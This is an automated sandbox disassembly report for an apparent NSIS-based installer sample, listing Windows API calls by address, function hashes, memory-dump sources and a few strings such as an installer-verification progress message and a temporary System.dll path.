                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                          • Opcode ID: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                                          • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404A9C
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                                                                                                          • MulDiv.KERNEL32(002952A5,00000064,002974C8), ref: 00402D4D
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                                                                                          • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                                                                                                          • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nswC001.tmp$C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll
                                                                                                                                                                                                                          • API String ID: 3109718747-1623422043
                                                                                                                                                                                                                          • Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                                                                                                          • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          • Opcode ID: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                                                                                                                                                          • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                                                                                          • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
